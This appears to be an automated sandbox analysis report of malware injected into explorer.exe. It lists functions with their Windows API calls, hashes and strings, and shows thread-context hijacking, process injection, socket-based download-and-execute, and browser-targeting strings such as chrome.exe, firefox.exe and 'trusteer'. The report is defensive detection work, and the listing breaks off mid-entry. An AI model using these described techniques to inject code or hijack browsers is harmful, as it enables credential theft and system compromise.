                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2622297391-0
                                                                                                                                                                                                                                  • Opcode ID: c3c3b82c019da38f545e400dafbdc7a126e809098d8c71de87a2eaa1f19f3d8e
                                                                                                                                                                                                                                  • Instruction ID: 0672ffb68ac4efc5ce4b93864942b02b81a5498f1390f3fcba9880401a36bdac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3c3b82c019da38f545e400dafbdc7a126e809098d8c71de87a2eaa1f19f3d8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2315D21716B6185EF11AF1AE51037A76A1FB48BD8F08C436DE4E1BB18EF3CC5418B40
                                                                                                                                                                                                                                  Function 0DF28500 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 882653843-0
                                                                                                                                                                                                                                  • Opcode ID: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                                  • Instruction ID: c2609d7fa4b6e8faefa6b3be440bda7caaab654ff41d2c9f334138cf3bf750f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31ECA32186918AD7118F39E9413797B70FB49FD8F088216EF894B78ACB2CD450C754
                                                                                                                                                                                                                                  Function 0DF352D0 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: lstrlenA.KERNEL32 ref: 0DF35112
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: InternetCrackUrlA.WININET ref: 0DF35127
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: PathFindFileNameA.SHLWAPI ref: 0DF351A1
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: GetTempPathA.KERNEL32 ref: 0DF351BF
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: GetTempFileNameA.KERNEL32 ref: 0DF351D5
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: lstrcatA.KERNEL32 ref: 0DF351E5
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: lstrcatA.KERNEL32 ref: 0DF351F1
                                                                                                                                                                                                                                    • Part of subcall function 0DF35070: CreateFileA.KERNEL32 ref: 0DF3521A
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: SHGetFolderPathA.SHELL32 ref: 0DF2F063
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: lstrcatA.KERNEL32 ref: 0DF2F073
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: lstrcatA.KERNEL32 ref: 0DF2F081
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: CreateDirectoryA.KERNEL32 ref: 0DF2F08C
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: SetFileAttributesA.KERNEL32 ref: 0DF2F09A
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: lstrcatA.KERNEL32 ref: 0DF2F0AA
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: lstrcatA.KERNEL32 ref: 0DF2F0B8
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F010: lstrcatA.KERNEL32 ref: 0DF2F0C8
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32 ref: 0DF35360
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32 ref: 0DF35376
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 0DF35389
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3447680573-0
                                                                                                                                                                                                                                  • Opcode ID: 671267d60bddb6862d7a4c6da8ec4eee382973f3ae306a35ae2e2ad9b41f222a
                                                                                                                                                                                                                                  • Instruction ID: 80a66ef62c06359a8938ab8dbca0ff32b6ed4569f8bd9193479cb6de3b961cd8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 671267d60bddb6862d7a4c6da8ec4eee382973f3ae306a35ae2e2ad9b41f222a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A21633272C9C292EB34D769F8647AE6361FFD8744F8681158ACE47A48EF6CC245CB10
                                                                                                                                                                                                                                  Function 0DF28850 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF28660: GetCurrentProcessId.KERNEL32 ref: 0DF286BB
                                                                                                                                                                                                                                    • Part of subcall function 0DF28660: GetCurrentThreadId.KERNEL32 ref: 0DF286C7
                                                                                                                                                                                                                                    • Part of subcall function 0DF28660: HeapAlloc.KERNEL32 ref: 0DF286F1
                                                                                                                                                                                                                                    • Part of subcall function 0DF28660: Thread32Next.KERNEL32 ref: 0DF28750
                                                                                                                                                                                                                                    • Part of subcall function 0DF28660: CloseHandle.KERNEL32 ref: 0DF28760
                                                                                                                                                                                                                                  • OpenThread.KERNEL32 ref: 0DF2889E
                                                                                                                                                                                                                                  • SuspendThread.KERNEL32 ref: 0DF288AF
                                                                                                                                                                                                                                    • Part of subcall function 0DF28C50: GetThreadContext.KERNEL32 ref: 0DF28C84
                                                                                                                                                                                                                                    • Part of subcall function 0DF28C50: SetThreadContext.KERNEL32 ref: 0DF28D44
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0DF288C6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4205413918-0
                                                                                                                                                                                                                                  • Opcode ID: 9f630cea53e37aabc4ebdd30438db49bbc8a4a76bea8f3890f44f4e46dfe1a39
                                                                                                                                                                                                                                  • Instruction ID: ec18eba327122dceb64a64224f9efa19613e2318707d334c428bf7fb6576392d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f630cea53e37aabc4ebdd30438db49bbc8a4a76bea8f3890f44f4e46dfe1a39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11015B32615B9586DB14DF6AE48062EB7A0FB89FC0F58D135DB9A03B18CF38D4668B00
                                                                                                                                                                                                                                  Function 0DF28B60 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF28610: Sleep.KERNEL32 ref: 0DF2863C
                                                                                                                                                                                                                                  • HeapCreate.KERNEL32 ref: 0DF28B7D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateHeapSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 221814145-0
                                                                                                                                                                                                                                  • Opcode ID: d0949f20c52cbdce83adff0a9d4d209debc98840f075ddf0d521f5aea9291ecb
                                                                                                                                                                                                                                  • Instruction ID: 02cff531ef48816691ab75ee02afa80778a88c0f33ad6503241c5b2ffd2a9b4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0949f20c52cbdce83adff0a9d4d209debc98840f075ddf0d521f5aea9291ecb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE03961F0132047EB25BBBD5C8237A2040DB583A0F88D4398E0A49742DA28C8EA9A75

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0E0D17F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                                  • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                                  • API String ID: 3240663557-511764017
                                                                                                                                                                                                                                  • Opcode ID: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                                  • Instruction ID: 3fd3bba48beeb94826034c3c166529be04dea61784cc03f602be3012f9c37d00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C16B72309B8286EB20DF62E85479A77A1F788B88F440525DE4E57F28DF78C599CB04
                                                                                                                                                                                                                                  Function 101F17F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                                  • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                                  • API String ID: 3240663557-511764017
                                                                                                                                                                                                                                  • Opcode ID: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                                  • Instruction ID: ae20d2ec835dc49d9a86822330cbacbc619e7053c84ecf4a01386ce5fa6c7259
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEC14C76304B858AEB50CF62E858B9A77A1F799BC8F400115DE9E47B28DF7CD589CB00
                                                                                                                                                                                                                                  Function 0E0D7070 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4277384649-0
                                                                                                                                                                                                                                  • Opcode ID: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                                  • Instruction ID: 8931d374d2e0c009f69f48fe728588ef6de10e4529bd1f3bb3a43a9d8fe9fb29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF1D472714BC286DB309F25E8907EE77A1F748B89F885566CB4A97B14EF78C588C700
                                                                                                                                                                                                                                  Function 101F7070 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4277384649-0
                                                                                                                                                                                                                                  • Opcode ID: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                                  • Instruction ID: dd28b5a3b7056f7dfa2bb2e7fdcdba882e9c499c3fdcf0e7ee72b1e62c136025
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36F1E572300A8586EB30DF25ED987DA77A1F748B99F415526CE8A8BB64DF7CC588C700
                                                                                                                                                                                                                                  Function 0E0D1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 596952117-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                                  • Instruction ID: 93d6450b4fd196f9d96965abf0bc7961a6a5c35b1dd5494e54b502b6402a3daf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7811672705B818AEB60CF62E854B9EB7A4F788B98F400525DE8D53F18DF78C459CB04
                                                                                                                                                                                                                                  Function 0DF21370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 596952117-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                                  • Instruction ID: ea80a283d360fce75f8ab11eae2022d09b10518a183a436d04e2820851f20faf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74814C72704B918AE720CF65F8407AEB7A5FB88B98F458126DE8D47B18DF78C155CB10
                                                                                                                                                                                                                                  Function 101F1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 596952117-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                                  • Instruction ID: 631cb25518401e15e06a364ac0b9e0050fa59ee0d0ebe3156cd56673bc2af0c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14814976604B808AE760CF62F844B9EB7A5F799BA8F410115EECD43B18DF78C159CB00
                                                                                                                                                                                                                                  Function 0E0E5070 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0E0E5112
                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET ref: 0E0E5127
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcpyA.KERNEL32 ref: 0E0D70CE
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D70DF
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D70F3
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D7107
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D7118
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D712C
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D714A
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: wsprintfA.USER32 ref: 0E0D7162
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D7176
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D718A
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D71C6
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: WSAStartup.WS2_32 ref: 0E0D71D6
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: socket.WS2_32 ref: 0E0D71F2
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: gethostbyname.WS2_32 ref: 0E0D7209
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: memcpy.MSVCRT ref: 0E0D7229
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: htons.WS2_32 ref: 0E0D7238
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: connect.WS2_32 ref: 0E0D724F
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrlenA.KERNEL32 ref: 0E0D7265
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: send.WS2_32 ref: 0E0D727B
                                                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 0E0E51A1
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32 ref: 0E0E51BF
                                                                                                                                                                                                                                  • GetTempFileNameA.KERNEL32 ref: 0E0E51D5
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0E51E5
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0E51F1
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0E0E521A
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 0E0E523F
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0E0E524E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0E0E5257
                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32 ref: 0E0E5285
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0E0E5294
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0E0E529F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3619236930-0
                                                                                                                                                                                                                                  • Opcode ID: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                                  • Instruction ID: faca021c31078deffed80a8769d0f78524f9ba495864b7df6f5bbeafa27adaeb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2517F36714A808AEB20DFA6E8643DE77A1F789BC8F444825DE4957F58DF78C584CB00
                                                                                                                                                                                                                                  Function 10205070 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 10205112
                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET ref: 10205127
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcpyA.KERNEL32 ref: 101F70CE
